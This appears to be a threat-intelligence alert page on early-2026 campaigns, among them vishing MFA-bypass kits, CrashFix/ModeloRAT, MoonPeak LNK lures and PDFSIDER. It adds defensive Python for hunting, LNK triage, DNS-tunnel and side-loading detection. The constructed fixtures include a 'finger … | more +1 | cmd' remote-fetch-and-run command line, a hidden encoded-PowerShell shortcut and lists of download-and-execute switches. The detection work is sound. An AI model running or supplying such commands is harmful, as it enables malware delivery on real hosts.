
Threat Alerts

Your place for the latest CyberProof cyber threat intelligence alerts and updates


Real-Time Vishing Kits Enable MFA Bypass Through Voice-Based Social Engineering

26-Jan-2026
Label: Trend
Threat Level: Medium

Custom phishing kits engineered specifically for voice-based social engineering are increasingly being sold on an as-a-service basis, enabling attackers to remotely control what victims see in their web browsers during live phone calls and dynamically manipulate authentication flows. These kits primarily target users of major platforms such as Google, Microsoft, and Okta, as well as cryptocurrency services, allowing attackers to synchronize phishing pages with verbal instructions in real time to defeat any MFA method that is not phishing-resistant. Captured credentials are forwarded via Telegram, enabling threat actors to immediately test them against legitimate login portals, identify which MFA challenge is triggered, and update the phishing page mid-call to prompt victims for OTPs or MFA push approvals. The commercialization of both these toolkits and vishing expertise itself highlights a broader shift toward highly interactive, human-led intrusion techniques that exploit trust built through direct verbal communication rather than relying solely on automated phishing at scale.
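Why a relay of this kind defeats OTP and push approvals but not origin-bound WebAuthn, as an added simulation (not code from the page or from any vishing kit): the relying party, the victim's authenticator, the phishing origin and both secrets are constructed, and HMAC stands in for the authenticator's real ECDSA signature. The server-side checks shown (origin in clientDataJSON, rpIdHash, challenge) are the ones a WebAuthn relying party performs and are what the kit cannot forge from a different origin.

```python
"""Real-time relay phishing: a stolen TOTP code replays fine, a WebAuthn assertion
obtained on the phishing origin does not.

Added illustration, not the page's or any kit's code. Relying party, authenticator,
domains and secrets are constructed; HMAC replaces the real ECDSA signature.
"""
import base64
import hashlib
import hmac
import json
import struct
import time
from typing import Optional

RP_ID = "login.example.com"                      # legitimate relying party (constructed)
RP_ORIGIN = "https://login.example.com"
PHISH_ORIGIN = "https://login-example.support"   # attacker's relay page (constructed)

TOTP_SECRET = b"victim-totp-seed-constructed"
DEVICE_KEY = b"victim-authenticator-key-constructed"


def totp(secret: bytes, t: Optional[int] = None, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP over HMAC-SHA1: the code the caller asks the victim to read out."""
    counter = int((time.time() if t is None else t) // step)
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def server_check_totp(code: str, t: Optional[int] = None) -> bool:
    return hmac.compare_digest(code, totp(TOTP_SECRET, t))


def authenticator_assert(challenge: bytes, browser_origin: str) -> dict:
    """Produce a WebAuthn-style assertion for a page loaded on browser_origin.

    The browser, not the page, writes the origin into clientDataJSON and only allows
    an RP ID that matches that origin, so a page on PHISH_ORIGIN cannot obtain an
    assertion bound to RP_ID no matter what the kit relays to it.
    """
    rp_id = browser_origin.split("://", 1)[1]        # browser-enforced RP ID
    client_data = json.dumps(
        {"type": "webauthn.get",
         "challenge": base64.urlsafe_b64encode(challenge).rstrip(b"=").decode(),
         "origin": browser_origin}, separators=(",", ":")).encode()
    auth_data = hashlib.sha256(rp_id.encode()).digest() + b"\x01" + b"\x00\x00\x00\x00"
    signed = auth_data + hashlib.sha256(client_data).digest()
    return {"clientDataJSON": client_data, "authenticatorData": auth_data,
            "signature": hmac.new(DEVICE_KEY, signed, hashlib.sha256).digest()}


def server_verify_assertion(challenge: bytes, assertion: dict) -> tuple:
    """Relying-party checks that stop a relay: challenge, origin, rpIdHash, signature."""
    cd = json.loads(assertion["clientDataJSON"])
    expected = base64.urlsafe_b64encode(challenge).rstrip(b"=").decode()
    if cd.get("type") != "webauthn.get" or cd.get("challenge") != expected:
        return False, "challenge mismatch"
    if cd.get("origin") != RP_ORIGIN:
        return False, "origin mismatch: %s" % cd.get("origin")
    ad = assertion["authenticatorData"]
    if ad[:32] != hashlib.sha256(RP_ID.encode()).digest():
        return False, "rpIdHash mismatch"
    signed = ad + hashlib.sha256(assertion["clientDataJSON"]).digest()
    if not hmac.compare_digest(assertion["signature"],
                               hmac.new(DEVICE_KEY, signed, hashlib.sha256).digest()):
        return False, "bad signature"
    return True, "ok"


def relay_attack(t: int = 1_700_000_000) -> dict:
    """Operator on the phone plus kit: everything the victim enters is forwarded live."""
    results = {}
    # 1. OTP: the victim reads out the 6 digits; the kit submits them to the real portal.
    stolen_code = totp(TOTP_SECRET, t)
    results["totp_relay"] = server_check_totp(stolen_code, t)
    # 2. WebAuthn: the real portal's challenge is forwarded to the victim's browser, which
    #    is on the phishing origin; the assertion it returns is bound to that origin.
    challenge = hashlib.sha256(b"server-nonce").digest()[:16]
    results["webauthn_relay"] = server_verify_assertion(
        challenge, authenticator_assert(challenge, PHISH_ORIGIN))
    # 3. Same authenticator, legitimate origin: accepted.
    results["webauthn_genuine"] = server_verify_assertion(
        challenge, authenticator_assert(challenge, RP_ORIGIN))
    return results
```

The relayed TOTP passes because nothing in a six-digit code ties it to where it was typed; the relayed assertion fails at the origin check before the signature is even examined.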

CrashFix Chrome Extension Delivers ModeloRAT via Browser Crash Lures

26-Jan-2026
Label: Malware
Threat Level: Medium

Cybersecurity researchers have identified an ongoing campaign called KongTuke that uses a malicious Chrome extension to deliberately crash browsers and trick victims into executing commands that deliver ModeloRAT malware.

The attack begins when victims search for ad blockers and encounter malicious advertisements that redirect them to a fake extension called “NexShield – Advanced Web Guardian” on the Chrome Web Store. The extension, downloaded over 5,000 times, is a clone of the legitimate uBlock Origin Lite and waits 60 minutes before activating. It then opens extension runtime port connections without bound, exhausting memory until the browser freezes and crashes. When the user restarts the browser, a fake security warning appears claiming that Microsoft Edge has detected threats and instructs them to execute a command via the Windows Run dialog.

The command abuses finger.exe, a network client shipped with Windows, to retrieve PowerShell scripts from attacker-controlled servers; the scripts are obfuscated with multiple layers of Base64 encoding and XOR operations. The payload scans for more than 50 analysis tools and virtual machine indicators and terminates if any are found. It then determines whether the host is domain-joined or standalone and sends system information, including installed antivirus products, to command-and-control servers. Domain-joined systems receive ModeloRAT, a Python-based remote access trojan that uses RC4 encryption, establishes persistence through Registry modifications, and can execute multiple file types. The campaign shows how threat actors manufacture a technical problem and then offer a fake fix, turning user frustration into persistent access.
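A hunt for the execution step described above, added here as an example (not tooling from the page or from the campaign): it scores process-creation records for finger.exe contacting a remote host and for a shell spawned by explorer.exe, which is what a command typed into the Run dialog looks like, and decodes the RunMRU registry key, where Windows records what was typed into Run. The records, users, host address and the "finger ... | more +1 | cmd" command chain are constructed, and the field names follow Sysmon Event ID 1.

```python
"""Hunting the CrashFix/KongTuke execution step in endpoint telemetry.

Added example, not the page's code. Records are constructed in the shape of Sysmon
process-creation (Event ID 1) fields plus an export of the RunMRU key; hosts, users
and the command chain are assumptions.
"""
import re

RUN_DIALOG_PARENT = "explorer.exe"       # a command entered in Win+R is spawned by explorer.exe
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# finger with a user@host argument talks to TCP/79 on that host; the reply is the payload
REMOTE_FINGER = re.compile(r"\bfinger(\.exe)?\s+\S*@\S+", re.IGNORECASE)
# "more +1" drops the first line of the reply, the rest is piped into cmd
PIPE_TO_CMD = re.compile(r"\|\s*more\s*\+1\s*\|\s*cmd", re.IGNORECASE)

CONSTRUCTED_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'cmd /c "finger agent@203.0.113.10 | more +1 | cmd"', "User": r"CORP\alice"},
    {"Image": r"C:\Windows\System32\finger.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "finger agent@203.0.113.10", "User": r"CORP\alice"},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd", "User": r"CORP\alice"},                 # the trailing "| cmd" stage
    {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe", "User": r"CORP\bob"},           # benign Run-dialog use
    {"Image": r"C:\Windows\System32\finger.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "finger", "User": r"CORP\carol"},              # no remote host: low signal
]

# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU: each value is the
# typed command followed by "\1"; MRUList gives most-recent-first order. Constructed.
CONSTRUCTED_RUNMRU = {
    "MRUList": "ba",
    "a": "notepad\\1",
    "b": 'cmd /c "finger agent@203.0.113.10 | more +1 | cmd"\\1',
}


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev: dict) -> tuple:
    """Return (score, reasons); higher means more CrashFix-like."""
    img, parent, cmd = _basename(ev["Image"]), _basename(ev["ParentImage"]), ev["CommandLine"]
    score, why = 0, []
    if img == "finger.exe" and "@" in cmd:
        score += 60
        why.append("finger.exe querying a remote host")
    if img in SHELLS and REMOTE_FINGER.search(cmd):
        score += 50
        why.append("shell command line chaining finger into cmd")
    if img in SHELLS and parent == RUN_DIALOG_PARENT:
        score += 30
        why.append("shell launched from explorer.exe (Run dialog)")
    if PIPE_TO_CMD.search(cmd):
        score += 20
        why.append("reply piped through 'more +1' into cmd")
    return score, why


def hunt(events: list, threshold: int = 50) -> list:
    hits = []
    for ev in events:
        score, why = score_event(ev)
        if score >= threshold:
            hits.append({"User": ev["User"], "CommandLine": ev["CommandLine"],
                         "Score": score, "Why": why})
    return hits


def runmru_entries(values: dict) -> list:
    """Decode RunMRU most-recent-first, stripping the trailing '\\1' marker."""
    out = []
    for key in values.get("MRUList", ""):
        if key in values:
            v = values[key]
            out.append(v[:-2] if v.endswith("\\1") else v)
    return out


def suspicious_runmru(values: dict) -> list:
    """A finger-to-remote-host entry here confirms the user typed the lure into Run."""
    return [cmd for cmd in runmru_entries(values) if REMOTE_FINGER.search(cmd)]
```

The RunMRU check is the forensic counterpart to the live telemetry rule: it survives on disk after the process events have aged out and ties the execution to a specific interactive user.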

LinkedIn Phishing Delivers RAT via DLL Sideloading

26-Jan-2026
Label: Trend
Threat Level: Medium

Threat actors are increasingly shifting phishing operations away from email and toward professional networking platforms such as LinkedIn, particularly to target executives and IT administrators. These campaigns abuse the platform’s inherent trust to establish rapport before delivering malicious WinRAR self-extracting archives that drop legitimate open-source applications alongside malicious DLLs, enabling execution via DLL side-loading. Post-compromise activity frequently relies on legitimate open-source penetration testing frameworks to maintain persistence and support data exfiltration, privilege escalation, and lateral movement. As a result, these campaigns present a heightened risk to organizations, particularly those with high-value personnel active on professional networking platforms, reflecting a broader trend toward combining social engineering, trusted software, and non-email delivery vectors to evade traditional enterprise defenses.

MoonPeak RAT Campaign Targets Windows Users via LNK Files

26-Jan-2026
Label: Malware
Threat Level: Medium

A new malware campaign targets Windows users through weaponized LNK shortcut files that deploy MoonPeak, a remote access trojan variant of XenoRAT linked to North Korean threat actors.

The infection begins when victims open malicious LNK files disguised as legitimate PDF documents containing Korean investment-related content. These files display a decoy PDF while executing an obfuscated PowerShell script in a hidden window. The script performs environment checks to detect security tools like IDA Pro, Wireshark, and OllyDbg, terminating if analysis environments are found. Upon passing these checks, the malware creates randomly named folders in temporary directories and establishes persistence through scheduled tasks.

The attack progresses through multiple stages, downloading GZIP-compressed payloads from GitHub repositories, a living-off-trusted-sites (LOTS) technique that blends the traffic in with legitimate use of the platform. The final payload, MoonPeak, is obfuscated with ConfuserEx and connects to command-and-control servers. The chain combines analysis-environment checks, scheduled-task persistence and trusted-site hosting, and uses investment-themed lures to target financial sector users.
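Triage of a shortcut like the one described above without double-clicking it, as an added example (not code from the page or from the MoonPeak campaign): a parser that follows the MS-SHLLINK layout (76-byte header, optional LinkTargetIDList and LinkInfo, then the StringData fields) and a scoring pass over what it finds. build_lnk() fabricates the sample; its PowerShell target, switches, encoded argument and the Acrobat icon path are constructed, and the encoded string decodes to a harmless placeholder rather than a real payload.

```python
"""Static triage of a weaponized Windows shortcut (.lnk).

Added example, not the page's or the campaign's code. Parser follows MS-SHLLINK;
the sample built below is constructed (target, switches, icon path are assumptions).
"""
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = [("name", HAS_NAME), ("relative_path", HAS_REL_PATH),
                 ("working_dir", HAS_WORK_DIR), ("arguments", HAS_ARGS),
                 ("icon_location", HAS_ICON)]
SW_SHOWMINNOACTIVE = 7       # ShowCommand value that keeps the launched window out of sight
SUSPICIOUS_SWITCHES = ("-enc", "-e ", "encodedcommand", "hidden", "iex", "downloadstring",
                       "invoke-webrequest", "bypass", "frombase64string", "-nop")
INTERPRETERS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript", "rundll32")


def build_lnk(target_rel: str, args: str, icon: str, show_cmd: int = SW_SHOWMINNOACTIVE) -> bytes:
    """Construct a minimal .lnk (StringData only, no IDList/LinkInfo) to exercise the parser."""
    flags = HAS_REL_PATH | HAS_ARGS | HAS_ICON | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_cmd, 0, 0, 0, 0)
    body = b""
    for value in (target_rel, args, icon):          # same order the parser expects
        body += struct.pack("<H", len(value)) + value.encode("utf-16-le")
    return header + body


def parse_lnk(blob: bytes) -> dict:
    """Extract target, arguments, icon and window state from a Shell Link file."""
    if len(blob) < 0x4C or blob[:4] != b"\x4c\x00\x00\x00" or blob[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", blob, 20)[0]
    show_cmd = struct.unpack_from("<I", blob, 60)[0]
    pos = 0x4C
    if flags & HAS_ID_LIST:                              # skip LinkTargetIDList
        pos += 2 + struct.unpack_from("<H", blob, pos)[0]
    if flags & HAS_LINK_INFO:                            # skip LinkInfo (size includes itself)
        pos += struct.unpack_from("<I", blob, pos)[0]
    out = {"show_command": show_cmd, "unicode": bool(flags & IS_UNICODE)}
    for field, bit in STRING_FIELDS:                     # CountCharacters then the characters
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", blob, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            out[field] = blob[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            out[field] = blob[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return out


def triage(info: dict) -> list:
    """Findings an analyst would want before anyone opens the file."""
    findings = []
    target = (info.get("relative_path", "") + " " + info.get("arguments", "")).lower()
    icon = info.get("icon_location", "").lower()
    if any(i in target for i in INTERPRETERS):
        findings.append("shortcut launches a shell/interpreter instead of a document")
    hits = [s for s in SUSPICIOUS_SWITCHES if s in target]
    if hits:
        findings.append("suspicious interpreter switches: " + ", ".join(hits))
    if info.get("show_command") == SW_SHOWMINNOACTIVE:
        findings.append("ShowCommand=SW_SHOWMINNOACTIVE (window minimized, easy to miss)")
    if icon and (icon.endswith(".pdf") or "acro" in icon or "reader" in icon) and ".pdf" not in target:
        findings.append("icon borrowed from a PDF viewer while the target is not a PDF")
    return findings


# Constructed sample: PowerShell target, hidden window, Acrobat icon; the -Enc blob
# decodes to a harmless placeholder string, not a payload.
SAMPLE_LNK = build_lnk(
    target_rel=r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    args="-NoP -W Hidden -Enc SQBFAFgAIAAoACIAZABlAGMAbwB5ACIAKQA=",
    icon=r"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe",
)
```

parse_lnk() skips the IDList and LinkInfo structures by their own size fields, so it also works on real shortcuts that carry them; the fields it returns are the ones worth putting straight into a ticket.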

Cisco Fixes Actively Exploited Zero-Day CVE-2026-20045 in Unified CM and Webex

26-Jan-2026
Label: Vulnerability
Threat Level: Medium

A zero-day remote code execution vulnerability, tracked as CVE-2026-20045 (CVSS base score 8.2, which falls in the High band of the CVSS scale), has been added to CISA's Known Exploited Vulnerabilities (KEV) catalog after being exploited in the wild. An unauthenticated, remote attacker can exploit the flaw to execute arbitrary commands on the underlying operating system of an affected device. The flaw affects Cisco Unified CM, Unified CM SME, IM & Presence, Unity Connection, and Webex Calling Dedicated Instance.

The vulnerability stems from improper validation of user-supplied input in HTTP requests. An attacker can exploit it by sending a sequence of crafted HTTP requests to the web-based management interface of an affected device; a successful exploit yields user-level access to the underlying operating system, from which the attacker can elevate privileges to root. Software updates that address the issue have been released, and there are no workarounds. Until the update is applied, limiting which networks can reach the web-based management interface reduces exposure but does not remove the vulnerability.

PDFSIDER Backdoor Abused by Ransomware Actors for Stealthy Access

26-Jan-2026
Label: Malware
Threat Level: Medium

PDFSIDER is a Windows backdoor designed for covert, long-term access and is already being leveraged by multiple ransomware operators as a payload loader. Its observed use in intrusions targeting Fortune 100 companies highlights its role in higher-end ransomware campaigns rather than opportunistic activity, reflecting a broader shift toward stealth-focused tooling within the ransomware ecosystem.

Initial access is achieved via spear-phishing emails delivering ZIP archives that contain a legitimate, digitally signed PDF creation executable alongside a malicious DLL. When launched, the application side-loads the attacker-controlled DLL, enabling execution while retaining the trust associated with signed software. Once active, PDFSIDER operates almost entirely in memory, spawning commands through anonymous pipes and CMD, assigning each compromised host a unique identifier, and collecting system reconnaissance data that is exfiltrated over DNS. Command-and-control communications are protected using AES-256-GCM encryption, while anti-analysis measures—including RAM size checks and debugger detection—allow the malware to exit early in sandboxed environments.
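Reconnaissance data leaving over DNS, as described above, is visible in resolver logs even when the C2 payload itself is encrypted. The detector below is an added example (not code from the page or from the malware): it groups queries per client and zone and scores the traits of an encoded channel, namely a never-repeating stream of subdomains, long high-entropy labels, and payload-capable query types. The log lines, the zone names, the thresholds and the weights are constructed and should be tuned against a real baseline.

```python
"""Spotting DNS-tunnelled host data of the kind PDFSIDER exfiltrates.

Added detection example, not the page's or the malware's code. Log lines, zones,
thresholds and weights are constructed assumptions.
"""
import math
import re
from collections import defaultdict

# Constructed resolver log: "<timestamp> <client> <qtype> <qname>". The queries to
# updates-cdn.test carry a short host tag plus one 32-hex-character chunk each.
CONSTRUCTED_DNS_LOG = """\
2026-01-26T09:00:01Z 10.1.2.3 A www.example.com
2026-01-26T09:00:02Z 10.1.2.3 TXT 7f3a1c.4e2b9d0a6c1f8e7b2d4a9c0e1f3b5d7a.host-a.updates-cdn.test
2026-01-26T09:00:03Z 10.1.2.3 TXT 7f3a1c.9b1e0c2d3f4a5b6c7d8e9f0a1b2c3d4e.host-a.updates-cdn.test
2026-01-26T09:00:04Z 10.1.2.3 TXT 7f3a1c.0a1b2c3d4e5f60718293a4b5c6d7e8f9.host-a.updates-cdn.test
2026-01-26T09:00:05Z 10.1.2.3 TXT 7f3a1c.c6d7e8f90a1b2c3d4e5f607182930a4b.host-a.updates-cdn.test
2026-01-26T09:00:06Z 10.1.2.3 A mail.example.com
2026-01-26T09:00:07Z 10.1.2.4 A cdn.static-assets.example.net
2026-01-26T09:00:08Z 10.1.2.3 TXT 7f3a1c.5b6c7d8e9f0a1b2c3d4e5f60718293a4.host-a.updates-cdn.test
"""

LINE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")
ZONE_DEPTH = 2        # simplification: last two labels = zone; use the Public Suffix List in production
LONG_LABEL = 24       # encoded chunks are long; real hostnames rarely are
HIGH_ENTROPY = 3.5    # bits per character; hex/base32 chunks sit near 4.0
MIN_QUERIES = 5
DATA_QTYPES = {"TXT", "NULL", "CNAME"}    # types whose answers can carry a payload back


def shannon_entropy(s: str) -> float:
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def zone_of(qname: str) -> str:
    return ".".join(qname.rstrip(".").split(".")[-ZONE_DEPTH:])


def parse(log: str) -> list:
    rows = []
    for line in log.splitlines():
        m = LINE.match(line.strip())
        if m:
            rows.append({"ts": m[1], "client": m[2], "qtype": m[3].upper(), "qname": m[4].lower()})
    return rows


def score_group(rows: list) -> tuple:
    """Score one (client, zone) pair; returns (score, reasons)."""
    names = {r["qname"] for r in rows}
    labels = [lbl for r in rows for lbl in r["qname"].split(".")[:-ZONE_DEPTH]]
    score, why = 0, []
    if len(rows) >= MIN_QUERIES and len(names) / len(rows) >= 0.9:
        score += 30
        why.append("almost every query is a never-before-seen subdomain")
    if any(len(lbl) >= LONG_LABEL for lbl in labels):
        score += 25
        why.append("label of %d+ characters" % LONG_LABEL)
    if max((shannon_entropy(lbl) for lbl in labels), default=0.0) >= HIGH_ENTROPY:
        score += 25
        why.append("high-entropy label (encoded data)")
    if sum(r["qtype"] in DATA_QTYPES for r in rows) / len(rows) >= 0.5:
        score += 20
        why.append("payload-capable query types dominate")
    return score, why


def detect(log: str, threshold: int = 60) -> list:
    """Group queries per (client, zone) and return the groups that look like a DNS channel."""
    groups = defaultdict(list)
    for r in parse(log):
        groups[(r["client"], zone_of(r["qname"]))].append(r)
    hits = []
    for (client, zone), rows in groups.items():
        score, why = score_group(rows)
        if score >= threshold:
            hits.append({"client": client, "zone": zone, "queries": len(rows),
                         "score": score, "why": why})
    return sorted(hits, key=lambda h: -h["score"])
```

Per-zone grouping matters: CDNs and telemetry services also generate unique subdomains, so a zone allow-list built from the baseline, not a global entropy rule, is what keeps this quiet in production.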

Operationally, PDFSIDER enables persistent, low-noise access by abusing trusted binaries, minimizing disk artifacts, and encrypting all C2 traffic, significantly complicating detection and forensic analysis. In several cases, attackers reinforced the malware deployment with social engineering, impersonating technical support personnel to persuade users to install remote access tools.
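Both the LinkedIn campaign above (a WinRAR SFX archive dropping an open-source application beside a malicious DLL) and the PDFSIDER loader (a signed PDF tool side-loading its DLL) share one observable: a trusted, signed executable loading an unsigned DLL from its own directory in a user-writable location. The scorer below is an added example (not code from the page or from either campaign) over records constructed in the shape of Sysmon image-load (Event ID 7) fields, with the loading process's own signature joined in from its process-creation event under assumed field names ImageSigned/ImageSigner. The paths, signer names, the RarSFX0 folder and the list of System32 DLL names are assumptions.

```python
"""Flagging DLL side-loading: a signed EXE loading an unsigned DLL from beside itself.

Added detection example, not the page's code; covers both the SFX-archive lure and
the PDFSIDER loader. Records, paths, signers and the system-DLL list are constructed.
"""
import ntpath

USER_WRITABLE_MARKERS = ("\\users\\", "\\temp\\", "\\appdata\\", "\\downloads\\", "\\programdata\\")
# DLL names that normally resolve from System32. A same-named file in the EXE's own
# directory is found first by the loader's search order. Constructed subset; in
# production enumerate %SystemRoot%\System32 on a clean reference host.
SYSTEM_DLL_NAMES = {"version.dll", "cryptbase.dll", "dwmapi.dll", "userenv.dll",
                    "wtsapi32.dll", "profapi.dll", "dbghelp.dll"}

CONSTRUCTED_IMAGE_LOADS = [
    # 1. SFX-extracted signed PDF tool loads an unsigned version.dll from its own folder
    {"Image": r"C:\Users\alice\AppData\Local\Temp\RarSFX0\PdfTool.exe",
     "ImageSigned": "true", "ImageSigner": "Example Software Ltd",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\RarSFX0\version.dll",
     "Signed": "false", "Signature": "", "SignatureStatus": "Unavailable"},
    # 2. Same process loading a genuine system DLL: normal
    {"Image": r"C:\Users\alice\AppData\Local\Temp\RarSFX0\PdfTool.exe",
     "ImageSigned": "true", "ImageSigner": "Example Software Ltd",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
     "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
    # 3. Installed app loading its own signed helper from Program Files: normal
    {"Image": r"C:\Program Files\ExampleApp\ExampleApp.exe",
     "ImageSigned": "true", "ImageSigner": "Example Software Ltd",
     "ImageLoaded": r"C:\Program Files\ExampleApp\helper.dll",
     "Signed": "true", "Signature": "Example Software Ltd", "SignatureStatus": "Valid"},
    # 4. Unsigned tool loading an unsigned plugin from Downloads: noisy, not side-loading
    {"Image": r"C:\Users\bob\Downloads\tool\tool.exe",
     "ImageSigned": "false", "ImageSigner": "",
     "ImageLoaded": r"C:\Users\bob\Downloads\tool\plugin.dll",
     "Signed": "false", "Signature": "", "SignatureStatus": "Unavailable"},
]


def _is_user_writable(path: str) -> bool:
    low = path.lower()
    return any(marker in low for marker in USER_WRITABLE_MARKERS)


def score_load(ev: dict) -> tuple:
    """Return (score, reasons) for one image-load record."""
    exe, dll = ev["Image"], ev["ImageLoaded"]
    exe_dir, dll_dir = ntpath.dirname(exe).lower(), ntpath.dirname(dll).lower()
    dll_name = ntpath.basename(dll).lower()
    exe_signed = ev.get("ImageSigned", "").lower() == "true"
    dll_valid = ev.get("Signed", "").lower() == "true" and ev.get("SignatureStatus") == "Valid"
    score, why = 0, []
    if exe_signed and not dll_valid:
        score += 40
        why.append("signed process loaded an unsigned/invalid DLL")
    if exe_dir == dll_dir:
        score += 20
        why.append("DLL sits in the process's own directory")
        if exe_signed and dll_valid and ev.get("Signature") != ev.get("ImageSigner"):
            score += 10
            why.append("side-by-side DLL signed by a different publisher")
    if _is_user_writable(dll_dir):
        score += 20
        why.append("DLL loaded from a user-writable location")
    if dll_name in SYSTEM_DLL_NAMES and dll_dir != r"c:\windows\system32":
        score += 30
        why.append("DLL name shadows a System32 library (search-order hijack)")
    return score, why


def detect(events: list, threshold: int = 60) -> list:
    hits = []
    for ev in events:
        score, why = score_load(ev)
        if score >= threshold:
            hits.append({"process": ev["Image"], "dll": ev["ImageLoaded"],
                         "score": score, "why": why})
    return sorted(hits, key=lambda h: -h["score"])
```

The signed-EXE condition is what separates side-loading from ordinary unsigned software: the attacker's whole point is to borrow the publisher's trust, so the DLL's signature state relative to its host process carries more weight than the path alone.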
